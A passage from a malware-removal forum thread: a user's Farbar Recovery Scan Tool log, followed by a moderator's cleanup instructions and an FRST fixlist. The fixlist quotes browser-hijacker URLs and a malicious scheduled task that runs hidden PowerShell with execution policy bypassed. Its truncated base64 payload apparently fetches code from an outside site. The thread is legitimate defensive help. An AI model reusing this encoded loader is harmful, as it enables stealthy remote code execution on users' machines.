Task: {5F6CAC0E-18E9-44C0-B0A7-6B7B5283B053} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {67A7A9A4-67A3-4723-BE20-8A0DC52591FC} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {7837661A-F267-4C88-835D-0FEAB2AFE198} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)
Task: {8163794B-8126-417A-A536-A2D2B46D957A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-01-06] (Hewlett-Packard)
Task: {89EB0970-3EEF-41E1-83D7-B74CA1FC5F84} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-31] (Google Inc.)
Task: {8B8AE3A2-57D8-4878-94C8-91CD171DC1B0} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_286_pepper.exe [2016-02-04] (Adobe Systems Incorporated)
Task: {958BBC7F-8109-4983-8D1C-68C7A044609C} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-19] (Microsoft Corporation)
Task: {B736EDDF-5008-4176-B799-5CFAB0C12C94} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe [2015-07-01] (CyberLink Corp.)
Task: {BB36727E-D5E4-4914-B0FF-8EF288AD33BD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {BBBACFB9-610E-4613-BC42-2509005FCC79} - System32\Tasks\HPCeeScheduleForJonathan => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {BCDFCA58-203D-4263-9162-150C79CDFCA3} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe [2016-01-01] (AVAST Software)
Task: {D258A394-8AA0-46DF-9F09-613901AA4AAA} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2015-05-21] (Hewlett-Packard Development Company, L.P.)
Task: {E4C69028-920C-463A-8288-F4646F3ACBC8} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-06-19] ()
Task: {E73353B5-CA09-4D8A-88FE-1B30EFF5BA32} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2016-01-19] (Microsoft Corporation)
Task: {FF03E025-7817-4F0C-957F-641451E6E937} - System32\Tasks\Hewlett-Packard\HP Support Assistant\First Boot => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe [2015-09-28] (Hewlett-Packard Company)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_286_pepper.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForJonathan.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-10-30 02:18 - 2015-10-30 02:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-01-12 22:15 - 2016-01-17 14:46 - 00171712 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2016-01-01 14:06 - 2016-01-01 14:06 - 00452456 _____ () C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
2015-10-13 04:45 - 2015-10-13 04:45 - 00085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-10-13 04:45 - 2015-10-13 04:45 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-09-06 02:20 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2015-12-08 10:47 - 2015-11-22 05:47 - 02653816 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-12-08 10:47 - 2015-11-22 05:47 - 02653816 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-01-31 09:22 - 2016-01-17 18:07 - 08913088 _____ () C:\Program Files\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2015-12-21 20:52 - 2015-12-06 23:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-21 20:52 - 2015-12-06 23:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-12 22:40 - 2016-01-04 20:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-12 22:40 - 2016-01-04 20:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-31 09:25 - 2016-01-16 00:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-31 09:25 - 2016-01-16 00:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-01-21 18:23 - 2016-01-21 18:23 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-02-23 20:27 - 2016-02-23 20:32 - 01511936 _____ () C:\Users\Jonathan\Downloads\AdwCleaner (1).exe
2016-02-04 10:42 - 2016-02-04 10:42 - 62319736 _____ () C:\Program Files (x86)\Opera\35.0.2066.37\opera.dll
2016-02-04 10:42 - 2016-02-04 10:42 - 02074232 _____ () C:\Program Files (x86)\Opera\35.0.2066.37\libglesv2.dll
2016-02-04 10:42 - 2016-02-04 10:42 - 00081528 _____ () C:\Program Files (x86)\Opera\35.0.2066.37\libegl.dll
2016-01-21 18:23 - 2016-01-21 18:23 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 18:23 - 2016-01-21 18:23 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-10 06:04 - 2015-07-10 06:02 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Jonathan\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{0348e5ad-d16b-4e8a-9ec2-517eb7ed8349}.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{35A3A6F1-55C9-4548-B3A7-BF8A56E742AB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{582A204D-2DFD-486A-8D45-9ED311D4B83E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{EC64CDB8-1E33-47A8-BA06-62E303E5DE14}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{A6EBF37F-3DC6-4B1C-9739-CF85416F0A78}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{BDC54A86-37B5-414E-8842-85A2F63415A3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7CC3ED8B-B61D-4AD2-A903-D45279451D61}] => (Allow) C:\Users\Jonathan\AppData\Local\Temp\nso4EC2.tmp\Installer-10005498.exe
FirewallRules: [{FF0DAC6D-27EC-4654-9CE1-999777489282}] => (Allow) C:\Users\Jonathan\AppData\Local\Temp\nso4EC2.tmp\Installer-10005498.exe
FirewallRules: [{2E505564-064F-4B73-8D04-3F911F8D157B}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
FirewallRules: [{F780D0C8-3EFA-49A7-92E1-E58E9AC0BC98}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{63606228-7F91-41CC-884B-2A5CC521CBED}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
FirewallRules: [{1242B9CA-740F-4A95-B11D-A9A3A84AA081}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
FirewallRules: [{67BAA940-B885-4DEA-9D53-939946C43A72}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
FirewallRules: [{39C06DBF-AADC-4572-989C-5B2080AA1498}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
FirewallRules: [{894684C0-4F6A-4EEE-A17A-DA8876D701A3}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War\GameData\sweaw.exe
FirewallRules: [{88403454-753A-4B8F-8665-9E059295F793}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War\GameData\sweaw.exe
FirewallRules: [{7D5C406E-D558-4256-B443-4D79C4418A9A}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War Forces of Corruption\swfoc.exe
FirewallRules: [{2C593D07-25E6-463D-9B5D-0277125A40FD}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War Forces of Corruption\swfoc.exe
FirewallRules: [{1343A9D1-9FEC-49E9-856C-350176CB0AD9}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{8DEC24A0-C242-47EF-8C87-77E3CDC9FB34}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{6F4FE454-D50F-4C3A-8A7E-F623137EF2C1}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{80E28F5C-830D-44DD-9D6A-8F05DBFC8A8E}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{7EFBC87D-EC25-4F92-BE76-83F380C8D360}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{5478731B-85FF-4F3C-8903-E17F4C655912}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
11-02-2016 18:06:59 Windows Update
15-02-2016 17:56:09 Windows Update
19-02-2016 07:52:09 Windows Update
19-02-2016 11:24:44 Restore Operation
22-02-2016 15:50:25 Windows Update
23-02-2016 20:27:56 JRT Pre-Junkware Removal
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (02/23/2016 08:28:11 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
 
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
 
System Error:
Access is denied.
.
 
Error: (02/23/2016 08:25:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: MsMpEng.exe, version: 4.9.10586.0, time stamp: 0x5632d908
Faulting module name: msvcrt.dll, version: 7.0.10586.0, time stamp: 0x5632d79e
Exception code: 0xc0000005
Fault offset: 0x000000000005d5b8
Faulting process id: 0x884
Faulting application start time: 0xMsMpEng.exe0
Faulting application path: MsMpEng.exe1
Faulting module path: MsMpEng.exe2
Report Id: MsMpEng.exe3
Faulting package full name: MsMpEng.exe4
Faulting package-relative application ID: MsMpEng.exe5
 
Error: (02/23/2016 08:21:29 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-FDU3B24)
Description: Activation of app Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147009280 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (02/23/2016 08:17:15 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10600.147) TYPE: ERROR
 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\Sources\Manager\EsifApplicationInterface.cpp @ line 737
Executing Function:  DptfEvent
Message:  Received unexpected event
Framework Event:  DptfResume [3]
 
Error: (02/23/2016 06:51:37 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10600.147) TYPE: ERROR
 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\Sources\Manager\EsifApplicationInterface.cpp @ line 737
Executing Function:  DptfEvent
Message:  Received unexpected event
Framework Event:  DptfResume [3]
 
Error: (02/23/2016 05:39:19 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10600.147) TYPE: ERROR
 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\Sources\Manager\EsifApplicationInterface.cpp @ line 737
Executing Function:  DptfEvent
Message:  Received unexpected event
Framework Event:  DptfResume [3]
 
Error: (02/22/2016 10:34:08 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 7047
 
Error: (02/22/2016 10:34:08 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 7047
 
Error: (02/22/2016 10:34:08 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
 
Error: (02/22/2016 10:34:05 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 4875
 
 
System errors:
=============
Error: (02/23/2016 08:26:08 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Defender Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 100 milliseconds: Run the configured recovery program.
 
Error: (02/23/2016 08:21:29 PM) (Source: DCOM) (EventID: 10001) (User: DESKTOP-FDU3B24)
Description: "C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe" -ServerName:SkypeHost.ServerServer15616App.AppXck5aaxyarfx8gxrgfk6pvakmmxeqvepc.mcaUnavailableUnavailable
 
Error: (02/22/2016 10:34:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/22/2016 08:39:18 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/22/2016 08:09:24 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Sync Host_c83bf service to connect.
 
Error: (02/22/2016 08:09:14 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_c83bf service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (02/22/2016 08:09:14 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/22/2016 05:49:57 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/22/2016 04:51:13 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/21/2016 07:50:28 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
 
CodeIntegrity:
===================================
  Date: 2016-02-23 20:41:49.644
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-23 20:41:49.604
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-23 20:27:09.838
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-23 20:27:09.828
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-23 20:25:57.869
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-22 19:59:56.150
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-22 19:59:56.133
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-20 18:18:45.722
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-19 22:02:08.818
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-19 15:33:41.399
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-5200U CPU @ 2.20GHz
Percentage of memory in use: 41%
Total physical RAM: 6066.26 MB
Available physical RAM: 3575.43 MB
Total Virtual: 7026.26 MB
Available Virtual: 4487.83 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:908.33 GB) (Free:827.3 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:22 GB) (Free:2.55 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 0E91C364)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

  • 0

#6
LiquidTension

LiquidTension

    Instructor

  • GeekU Moderator
  • 1,068 posts

Hello Jonathan,
 
Please rerun AdwCleaner, only this time click Cleaning. Include AdwCleaner[C1].txt in your next reply. In addition, please carry out the steps below.

 

Ensure you carry out each step one at a time - please do not perform multiple steps at the same time.
 
STEP 1
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    CreateRestorePoint:
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
    CHR StartupUrls: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"    
    CHR DefaultSearchURL: Default -> hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV1ZU19BFFEabVheA1hcFQxFIhQAUlhFDAJHdAhaAg4VFAYUIh9aFQQTQkcFME0FBloEURNNfWpdAEsSSX5NL04=&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> searchinterneat-a.akamaihd.net
    CHR DefaultNewTabURL: Default -> hxxp://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFFCcl8IVF1IDFRFIlgVVQAXQxgbc1gMTA4VFQRBIw5cVApGQxNBNARaAktXUUEeJ1pNER8fHGZGIUtbCXIfTkI=
    OPR StartupUrls: "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghHIQteUQwVGBhCJltZTA1IR1cOeApZVRRGRQESIloPBQxCFlcFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlE6T1pU"
    2016-02-19 08:25 - 2016-02-19 21:57 - 00000000 ____D C:\ProgramData\54070cb8-2431-0
    2016-02-19 08:20 - 2016-02-19 21:57 - 00000000 ____D C:\ProgramData\54070cb8-6861-0
    2016-02-19 08:20 - 2016-02-19 08:20 - 00000000 ____D C:\ProgramData\{2b04c619-412c-1}
    2016-02-19 08:20 - 2016-02-19 08:20 - 00000000 ____D C:\ProgramData\{08be3c40-312c-0}
    2016-02-19 08:20 - 2016-01-15 10:14 - 00000000 ____D C:\ProgramData\b3eda95e-7691-0
    2016-02-19 08:20 - 2016-01-15 10:14 - 00000000 ____D C:\ProgramData\b3eda95e-5667-1
    Task: {5BB340FA-98D2-4DA0-94D1-6CD0DEC5E954} - System32\Tasks\{7E0B0E47-0F79-0808-0B11-0C0C0A7F110C} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAdQBuAGwAbwBuAGcAbwAuAGkAbgBmAG8ALwB1AC8APwBhAD0AZQBzAHoASABHAHEAUwBjAEUAeQBxAG0AeAB4AGQANQBvAFMAUABkADQAdABSAFYAQwAxAHAATABaAGQAQwBIAF8AZABqAGoAbgBKADUAagA4AHQATgBZAEkAaQBrAEcAeABaAEEAagBtAHIAbABPAEYAWQBpAFAAYwBaAEYAbgBQADAAXwA0ADcAWgA1AEsATgBNADcAcQBiAHcASQB0AHkATQA1AG4AZgB1AHIANgBFAFQAcwBzAHoANwBEAHMAcgBGAHUARABiAFUAYQBQAHgAMQBRAG0ASgBYAEcATwBNAHoATQBFAGIAMQBiAFEAbQBZADgAaAB6AEMAOQB0ADUASwBfAE8AYQBPAEQAZABjAEsAXwBMAEIAYQBSAGIAdgAyAG8AQQBGADQAdQA1AHcAdgB5AHgAZwA0ADAARwB1AEsAdgAtAHEAOQA1AEoALQBlAGcAYQBOAGUAeABVAGUAWgBWAHEANQBhAFgAZQ